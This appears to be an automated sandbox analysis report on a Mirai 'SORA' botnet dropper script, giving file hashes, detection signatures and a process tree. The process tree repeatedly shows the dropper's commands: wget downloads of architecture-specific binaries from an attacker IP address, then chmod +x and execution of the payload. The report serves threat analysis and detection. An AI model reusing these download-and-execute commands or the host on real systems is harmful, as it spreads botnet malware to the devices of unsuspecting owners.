mirai | d9f728a47fa5a86666d21a766392b9e86d1088531c251e20bcef7e17339f2a5a

Analysis

max time kernel
6s
max time network
1074s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20230712-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20230712-enkernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
14/07/2023, 13:58

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

sora.sh
Size

2KB
MD5

65e3e70bdc5ae1264fc90c0dfb6de735
SHA1

169fef9b4d0baae964e2fcc15c9c748b4cb75568
SHA256

d9f728a47fa5a86666d21a766392b9e86d1088531c251e20bcef7e17339f2a5a
SHA512

bd2f199412245005f759004ba84a78c87c93b4932046512c892c77c20664cc81cdcd81c7f487ad5fd50ec70ad9664e28c118edd177f2a353fd4bd6d2723fc44e

Score

10^/10

mirai sora botnet upx

Malware Config

Extracted

Family

mirai

Botnet

SORA

Extracted

Family

mirai

Botnet

SORA

Extracted

Family

mirai

Botnet

SORA

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai

Changes its process name 1 IoCs

description	pid	Process
Changes the process name, possibly in an attempt to hide itself	603	wget

Executes dropped EXE 14 IoCs

ioc	pid	Process
/tmp/robben	603	wget
/tmp/robben	608	cat
/tmp/robben	618	chmod
/tmp/robben	623	robben
/tmp/robben	629	wget
/tmp/robben	634	cat
/tmp/robben	640	chmod
/tmp/robben	646	robben
/tmp/robben	652	wget
/tmp/robben	658	cat
/tmp/robben	664	chmod
/tmp/robben	670	Process not Found
/tmp/robben	676	Process not Found
/tmp/robben	682	Process not Found

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/fstream-1.dat	upx
behavioral4/files/fstream-2.dat	upx
behavioral4/files/fstream-3.dat	upx
behavioral4/files/fstream-4.dat	upx
behavioral4/files/fstream-5.dat	upx
behavioral4/files/fstream-6.dat	upx
behavioral4/files/fstream-7.dat	upx
behavioral4/files/fstream-8.dat	upx
behavioral4/files/fstream-9.dat	upx

Writes file to tmp directory 12 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/sora.sh4	wget
File opened for modification	/tmp/sora.x86	wget
File opened for modification	/tmp/robben	Process not Found
File opened for modification	/tmp/sora.mips	wget
File opened for modification	/tmp/sora.mpsl	wget
File opened for modification	/tmp/sora.arm7	wget
File opened for modification	/tmp/sora.ppc	wget
File opened for modification	/tmp/sora.x86_64	wget
File opened for modification	/tmp/sora.i686	wget
File opened for modification	/tmp/sora.arm5	wget
File opened for modification	/tmp/sora.arm6	wget
File opened for modification	/tmp/sora.m68k	wget

/tmp/sora.sh
/tmp/sora.sh
1⤵
PID:598
- /usr/bin/wget
  wget http://84.54.51.228/bins/sora.x86
  2⤵
  - Writes file to tmp directory
  PID:599
- /bin/cat
  cat sora.x86
  2⤵
  PID:601
- /bin/chmod
  chmod +x netplan_s876jdct robben sora.sh sora.x86 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw
  2⤵
  PID:602
- /tmp/robben
  ./robben Payload
  2⤵
  PID:603
- /usr/bin/wget
  wget http://84.54.51.228/bins/sora.mips
  2⤵
  - Changes its process name
  - Executes dropped EXE
  - Writes file to tmp directory
  PID:604
- /bin/cat
  cat sora.mips
  2⤵
  PID:606
- /bin/chmod
  chmod +x netplan_s876jdct robben sora.mips sora.sh sora.x86 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw
  2⤵
  PID:607
- /tmp/robben
  ./robben Payload
  2⤵
  PID:608
- /usr/bin/wget
  wget http://84.54.51.228/bins/sora.x86_64
  2⤵
  - Writes file to tmp directory
  PID:614
- /bin/cat
  cat sora.x86_64
  2⤵
  - Executes dropped EXE
  PID:616
- /bin/chmod
  chmod +x netplan_s876jdct robben sora.mips sora.sh sora.x86 sora.x86_64 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw
  2⤵
  PID:617
- /tmp/robben
  ./robben Payload
  2⤵
  PID:618
- /usr/bin/wget
  wget http://84.54.51.228/bins/sora.i468
  2⤵
  PID:619
- /bin/cat
  cat sora.i468
  2⤵
  PID:621
- /bin/chmod
  chmod +x netplan_s876jdct robben sora.mips sora.sh sora.x86 sora.x86_64 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw
  2⤵
  - Executes dropped EXE
  PID:622
- /tmp/robben
  ./robben Payload
  2⤵
  PID:623
- /usr/bin/wget
  wget http://84.54.51.228/bins/sora.i686
  2⤵
  - Writes file to tmp directory
  PID:625
- /bin/cat
  cat sora.i686
  2⤵
  PID:627
- /bin/chmod
  chmod +x netplan_s876jdct robben sora.i686 sora.mips sora.sh sora.x86 sora.x86_64 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw
  2⤵
  PID:628
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  PID:629
- /usr/bin/wget
  wget http://84.54.51.228/bins/sora.mpsl
  2⤵
  - Writes file to tmp directory
  PID:630
- /bin/cat
  cat sora.mpsl
  2⤵
  PID:632
- /bin/chmod
  chmod +x netplan_s876jdct robben sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw
  2⤵
  PID:633
- /tmp/robben
  ./robben Payload
  2⤵
  PID:634
- /usr/bin/wget
  wget http://84.54.51.228/bins/sora.arm4
  2⤵
  - Executes dropped EXE
  PID:636
- /bin/cat
  cat sora.arm4
  2⤵
  PID:638
- /bin/chmod
  chmod +x netplan_s876jdct robben sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw
  2⤵
  PID:639
- /tmp/robben
  ./robben Payload
  2⤵
  PID:640
- /usr/bin/wget
  wget http://84.54.51.228/bins/sora.arm5
  2⤵
  - Writes file to tmp directory
  PID:642
- /bin/cat
  cat sora.arm5
  2⤵
  - Executes dropped EXE
  PID:644
- /bin/chmod
  chmod +x netplan_s876jdct robben sora.arm5 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw
  2⤵
  PID:645
- /tmp/robben
  ./robben Payload
  2⤵
  PID:646
- /usr/bin/wget
  wget http://84.54.51.228/bins/sora.arm6
  2⤵
  - Writes file to tmp directory
  PID:648
- /bin/cat
  cat sora.arm6
  2⤵
  PID:650
- /bin/chmod
  chmod +x netplan_s876jdct robben sora.arm5 sora.arm6 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw
  2⤵
  - Executes dropped EXE
  PID:651
- /tmp/robben
  ./robben Payload
  2⤵
  PID:652
- /usr/bin/wget
  wget http://84.54.51.228/bins/sora.arm7
  2⤵
  - Writes file to tmp directory
  PID:654
- /bin/cat
  cat sora.arm7
  2⤵
  PID:656
- /bin/chmod
  chmod +x netplan_s876jdct robben sora.arm5 sora.arm6 sora.arm7 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw
  2⤵
  PID:657
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  PID:658
- /usr/bin/wget
  wget http://84.54.51.228/bins/sora.ppc
  2⤵
  - Writes file to tmp directory
  PID:660
- /bin/cat
  cat sora.ppc
  2⤵
  PID:662
- /bin/chmod
  chmod +x netplan_s876jdct robben sora.arm5 sora.arm6 sora.arm7 sora.i686 sora.mips sora.mpsl sora.ppc sora.sh sora.x86 sora.x86_64 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw
  2⤵
  PID:663
- /tmp/robben
  ./robben Payload
  2⤵
  PID:664
- /usr/bin/wget
  wget http://84.54.51.228/bins/sora.ppc440fp
  2⤵
  - Executes dropped EXE
  PID:666
- /bin/cat
  cat sora.ppc440fp
  2⤵
  PID:668
- /bin/chmod
  chmod +x netplan_s876jdct robben sora.arm5 sora.arm6 sora.arm7 sora.i686 sora.mips sora.mpsl sora.ppc sora.sh sora.x86 sora.x86_64 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw
  2⤵
  PID:669
- /tmp/robben
  ./robben Payload
  2⤵
  PID:670
- /usr/bin/wget
  wget http://84.54.51.228/bins/sora.m68k
  2⤵
  - Writes file to tmp directory
  PID:672
- /bin/cat
  cat sora.m68k
  2⤵
  - Executes dropped EXE
  PID:674
- /bin/chmod
  chmod +x netplan_s876jdct robben sora.arm5 sora.arm6 sora.arm7 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.x86 sora.x86_64 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw
  2⤵
  PID:675
- /tmp/robben
  ./robben Payload
  2⤵
  PID:676
- /usr/bin/wget
  wget http://84.54.51.228/bins/sora.sh4
  2⤵
  - Writes file to tmp directory
  PID:678
- /bin/cat
  cat sora.sh4
  2⤵
  PID:680
- /bin/chmod
  chmod +x netplan_s876jdct robben sora.arm5 sora.arm6 sora.arm7 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.sh4 sora.x86 sora.x86_64 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw
  2⤵
  - Executes dropped EXE
  PID:681
- /tmp/robben
  ./robben Payload
  2⤵
  PID:682

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/robben

Filesize
27KB

MD5
a1afc807c5a94a76944425e244394f55

SHA1
dbee50ebf8997efb4172fd94cd3c93fb46c129bd

SHA256
d772fac7e804ba4665ae5940b7ba9976e27ce226599a6a7a6c7dfd35a4e6c8e1

SHA512
c16967647923e46c0e1dc77f65dffcd5fe4f25a66b29462ddd83b4888ede735b25a51bca86fe71d5a862fe940287b52f42ddb792a69b125121abceb0cdc2cf64

Download Submit
/tmp/robben

Filesize
64KB

MD5
69362739313a0a0848121493f6d7d060

SHA1
c66084576629b9babcbf7714e9ee6299a536f6f6

SHA256
ef47b66dc33d1d3fc253d432a3dd25f1638a26ff4ca2939d45afb0012832ca10

SHA512
30ec4b6517557e01a772df2d582ce9670d3d04bf90653ea26aa619b31122c26ffa6125c154bfc10162de3a9f3d836f6e22a816d21fec4c1d5adbf36439ebc5c2

Download Submit
/tmp/robben

Filesize
62KB

MD5
4edb2332b05e1c7959b86c4c8cc424da

SHA1
5fab6354d709aa5e08e9e7f32c3150f1cd1a98a0

SHA256
9f19204442046118f5a3e80f8f711eb13449f649c70ed6f30c54521ff67d34c7

SHA512
f3faaeafaab32e29a9a8582c5330ca312295d93d4489c2f22b3b5345a2552d1d7db0ba5c561a5fbee14c5c44f3bb29745938680103526a805140903707776e4d

Download Submit
/tmp/robben

Filesize
28KB

MD5
f34c525a0014142686be14e983dc387f

SHA1
993504c19a3b0d491d1d9aac73fd716cfbe5a491

SHA256
5c9b8a3eec07274bd27d4f9ca4750333a03318e873bd9c3de72d4b878432221a

SHA512
2d290351666d5d13211616248a2c84baaecfe7fc274b4521055f535a83d0898ea25c5af568631fb114f40eee1e8a8430d2edf80abbbbda2550f74c41c14b4706

Download Submit
/tmp/robben

Filesize
28KB

MD5
d9546c9d44fae50f4bcadb179c258445

SHA1
56c5454e804d56b140eabfdb33cb2864b4c7c3bb

SHA256
dfb6729d0ce535095291422135939b43762e245586b45aa906d2e82d485df03c

SHA512
9af1f59bfba90e13c09b14f7842b68377344ed4ef2c5527633ca41c4147e2bc44bd74e786ade2488552df4be987260163f46e97ac5cce592e60524b2883b6a04

Download Submit
/tmp/robben

Filesize
28KB

MD5
828783c11567256d715c474616ec8d79

SHA1
0fc44b08a8449dbecfa5be020c5cce270f89e99b

SHA256
cabe23ac6d7912618a81e8a9134242a13df7950c53cefd60309192444159ec8f

SHA512
11a91068f0c03b68650c9ee692ab37efcdabbb9ff05b3ea0c4b7b45bb5dfddb7f3115ee7a299de582d45603a612f68d98cf106f2f2768e8061d354d1a7507e72

Download Submit
/tmp/robben

Filesize
29KB

MD5
e14d977210f6b2f4c284c9c901691dcf

SHA1
a7a50c1e96c954178e882effa85f89f03a2ac035

SHA256
7536c6ff52202b18e4be32ad69abcec6ac6328dcaabd3e7470f37f584362a50d

SHA512
f12bfe548653273e3ff82796ad0917d422b3354fd398bdaf04a5197b2dad9a1979c3f90b55855e7c39b7d4e3ff838fbd018788c8621d2377f770f0dcb7b8dc37

Download Submit
/tmp/robben

Filesize
23KB

MD5
82078bfd579a89b5b8193c41f82ce86d

SHA1
1514ee0afe368a195e7911353278cbaff2a417c9

SHA256
73350cae4759a22cc1016ff53bc218b4282a50d3529526852fca7883f7f6727d

SHA512
a992f070ab5012899b10e65ec4fb53b4b86c6dd07209f9e11696d35f212cbd572e546311baa1b4960fdffd0ef0854f7ba48d41e64809d1853a0a7f80f48f80b2

Download Submit
/tmp/robben

Filesize
32KB

MD5
b507e1ce150fc70002cc099066519fe7

SHA1
17b8f2c9c06cc0066b3694a27ad871731f54308d

SHA256
aa0e5f84d4638acc1007cf70fed30c220be4a1ebf900c3cdd95dd8ca9735436b

SHA512
b722faa2e1e1f2ce08f62a802951cbbf28b49e5ac8dc261087b6d93ede21e4d151d0734482d0b30cddbea7934ffad56be0f556eebed95c988e654360aa2132af

Download Submit
/tmp/robben

Filesize
51KB

MD5
609ef32f9fe31dec388559472b733052

SHA1
e90a1facf1e0ce8695e233b1688666ac16649348

SHA256
41c9245e3a425ebc999405a469a4c6d7f067ed22f376a5b5bef6d79fda549ac0

SHA512
da118f801371c0e0c145a7741e76287b604fa783ef7fe419d367fa9cb7e77a806dd1f4aa28773865130ee8531a919a48f43a911100a7dfb518039ff7330e99b0

Download Submit
/tmp/robben

Filesize
26KB

MD5
438404d6a451adad15817439b3990694

SHA1
1d370dfa8dea860adb687c50422e6c93fdc81f7d

SHA256
904516e9cdf341352996c8effdefab99206c7f22b5c3b0353c4a72eb0201e939

SHA512
b66d9072f5d7b53a1825687315aef82825e013ed7c3466bd46c58faeefd946c0138ebb0dbaca9f6536a667b15977273f67d3d1ab60ba860bef1b45a64aa18519

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads